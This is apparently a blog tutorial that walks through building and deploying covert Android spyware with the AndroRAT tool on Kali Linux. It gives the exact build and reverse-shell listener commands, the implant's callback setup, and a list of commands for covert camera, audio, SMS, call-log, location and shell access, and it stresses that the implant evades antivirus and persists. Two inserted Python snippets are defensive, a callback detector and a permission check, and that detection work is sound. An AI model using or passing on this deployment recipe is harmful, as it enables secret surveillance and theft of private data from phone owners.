How to hack an Android phone using Kali Linux
How to set up undetectable spyware on an Android phone using Kali Linux.
As I was re-watching Mr. Robot, the famously realistic hacking TV show, I noticed in one episode how one of the hackers installed spyware on a phone to spy on the phone’s owner.
I wondered: now that Android has evolved a lot, is it still possible to hack an Android phone without being detected by antivirus software? After some research, I found some interesting results that I’m about to share with you in this post. But before that, as always…
Disclaimer
I remind you that it’s illegal to attack a device if you don’t have permission to do so. This demonstration is for educational purposes only. In this post, I’ll use my own phone. You shouldn’t try it on someone else’s.
Understand how a RAT works
First, a little theory before practice. A RAT (remote access Trojan) is malware installed on a target device (usually a phone or a PC). It can be installed by the attacker directly, if they have physical access to the device, or through an infected app that the user installs themselves. Once running, the implant connects out to a particular IP address and port chosen by the attacker. To receive that connection, the attacker runs a listener on that address and waits for the implant to call back. Once the implant connects, the channel is established and the attacker can issue commands and pull data off the device.
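The callback pattern described above is also what a defender can look for: one device repeatedly connecting to the same non-standard IP:port at regular intervals. The following detector is an added example, not code from this post or from AndroRAT; the log format, addresses and timestamps are constructed.

```python
"""Spot a device that keeps calling back to one fixed IP:port.
Added example, not code from the post or from AndroRAT; log format,
addresses and timestamps below are constructed."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records: "epoch src_ip dst_ip dst_port".
SAMPLE_FLOWS = """\
1700000000 10.0.0.23 142.250.74.78 443
1700000005 10.0.0.23 10.0.0.50 4444
1700000065 10.0.0.23 10.0.0.50 4444
1700000125 10.0.0.23 10.0.0.50 4444
1700000185 10.0.0.23 10.0.0.50 4444
1700000190 10.0.0.23 142.250.74.78 443
1700000245 10.0.0.23 10.0.0.50 4444
1700000300 10.0.0.31 172.217.16.46 443
1700000400 10.0.0.31 172.217.16.46 443
"""
COMMON_PORTS = {53, 80, 123, 443}  # DNS, web, NTP: skipped to cut noise

def parse_flows(text):
    """Yield (ts, src, dst, dport) tuples from the constructed log lines."""
    for line in text.splitlines():
        ts, src, dst, port = line.split()
        yield int(ts), src, dst, int(port)

def find_beacons(flows, min_conns=4, max_jitter=0.3):
    """Return (src, dst, dport, avg_gap) for regular repeated callbacks:
    one source hitting the same non-common port >= min_conns times with
    gaps whose stdev/mean <= max_jitter, i.e. an implant reconnecting."""
    by_dest = defaultdict(list)
    for ts, src, dst, dport in flows:
        by_dest[(src, dst, dport)].append(ts)
    hits = []
    for (src, dst, dport), times in by_dest.items():
        if dport in COMMON_PORTS or len(times) < min_conns:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            hits.append((src, dst, dport, round(avg)))
    return hits

if __name__ == "__main__":
    for hit in find_beacons(parse_flows(SAMPLE_FLOWS)):
        print("possible RAT callback: %s -> %s:%d every ~%ds" % hit)
```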
Setting up the environment
As always, I’ll use Kali Linux to create the malware and to set up my reverse shell.
For the hypervisor users
If you’re using a VM in a private network, make sure your hypervisor’s network settings are set to bridged mode (connected to the physical network).
Setting a static IP
On a local network, we have to give Kali a static IP and stop it from taking its address from DHCP, since the implant will be built with that address hard-coded. We need to edit the Kali network configuration file with nano:
sudo nano /etc/network/interfaces
We add our settings under what’s already in the file, save (Ctrl+S) and quit (Ctrl+X):
auto eth0
iface eth0 inet static
address [The IP you want to give to your kali]/24
gateway [your gateway IP ]
Then we restart the networking service:
sudo systemctl restart networking.service
If you check with ip addr, it should look like this:
Setting up Python
Now we need to install pip and colorama:
sudo apt install python3-pip
colorama is sometimes already installed, but just in case it isn’t:
pip install colorama
Setting up Java
Java is already installed in Kali. You just have to set your default Java version to Java 8:
sudo update-alternatives --config java
Then choose the number corresponding to Java 8 (here 2).
Cloning AndroRat
Clone the AndroRAT project from GitHub (https://github.com/karma9874/AndroRAT).
Building the infected app
OK, now that everything is set up, let’s move into the AndroRAT folder and start the program.
cd AndroRAT/
We can build our malware using --build, with -i to indicate our IP, -p the port the implant will connect back to, and -o the name of the APK you’re generating:
python3 androRAT.py --build -i [your_static_ip] -p [your_port] -o [your_app_name].apk
Setting up a listener shell
Once the app is generated, let’s set up the listener. I recommend running the shell as root to avoid permission problems in Kali.
sudo python3 androRAT.py --shell -i [your_static_ip] -p [your_port]
From now on, Kali is waiting for connections. Anyone who installs the infected app on their phone will connect back to us.
Installing the infected app on the target
Let’s install the malware on the target. I’m going to use my phone as the target. As you can see, the app is not detected by the default antivirus. The only shady thing is that the app requests a lot of permissions.
The reverse Shell
Back on our Kali Linux, we get a reverse shell into the phone the second the target opens the app. The malware is persistent, which means it survives a restart of the phone.
Now that we have access to the target, a lot of features are available:
Capture a photo / Video
Dump SMS
We can also get the call logs, vibrate the phone, record audio… and much more. Here is the full list (from https://github.com/karma9874/AndroRAT):
deviceInfo --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts a sh shell of the device
vibrate [number_of_times] --> vibrate the device number of time
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter
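Almost every command in that list depends on a runtime permission the app has to declare, which is why the permission prompt was the one visible red flag during installation. The following triage check is an added example, not code from this post or from AndroRAT: it parses the output of the real `aapt dump permissions <apk>` command (the sample output is constructed for a fictional flashlight app) and reports which of the listed features the declared permissions would enable.

```python
"""Check which of the commands listed above an APK's permissions would allow.
Added example, not code from the post or from AndroRAT. It reads the output
of `aapt dump permissions <apk>`; the sample output below is constructed.
The clipboard and sh-shell commands need no dangerous permission, so this
check cannot see them."""
import re

# Permission -> command(s) from the list above that depend on it.
CAPABILITY_PERMISSIONS = {
    "android.permission.INTERNET": "callback to the listener",
    "android.permission.CAMERA": "takepic / startVideo",
    "android.permission.RECORD_AUDIO": "startAudio / startVideo",
    "android.permission.READ_SMS": "getSMS",
    "android.permission.READ_CALL_LOG": "getCallLogs",
    "android.permission.ACCESS_FINE_LOCATION": "getLocation",
    "android.permission.ACCESS_COARSE_LOCATION": "getLocation",
    "android.permission.READ_PHONE_STATE": "getSimDetails",
    "android.permission.RECEIVE_BOOT_COMPLETED": "persistence across reboot",
}

# Constructed aapt output for a fictional "flashlight" app.
SAMPLE_AAPT = """\
package: com.example.flashlight
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.READ_CALL_LOG'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
uses-permission: name='android.permission.RECEIVE_BOOT_COMPLETED'
"""
# Accepts both "name='X'" (current aapt) and the older bare "X" form.
PERM_RE = re.compile(r"uses-permission:\s*(?:name=')?([\w.]+)")

def parse_permissions(aapt_output):
    """Return the set of permission names declared in the aapt output."""
    return set(PERM_RE.findall(aapt_output))

def spyware_capabilities(perms):
    """Return the sorted RAT features this permission set enables."""
    return sorted({cap for p, cap in CAPABILITY_PERMISSIONS.items() if p in perms})

def review(aapt_output, threshold=4):
    """Flag the app when its permissions cover >= threshold listed features."""
    caps = spyware_capabilities(parse_permissions(aapt_output))
    return len(caps) >= threshold, caps
```

A flashlight app that can take pictures, record audio, read SMS and call logs, track location and restart itself at boot is the "lot of permissions" the post calls shady, made explicit.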
Conclusion
I am amazed (and a bit scared too) at how simple it was to set up an undetectable RAT on a recent, updated Android phone. Sure, it requires some research and some network knowledge, but it’s far from impossible.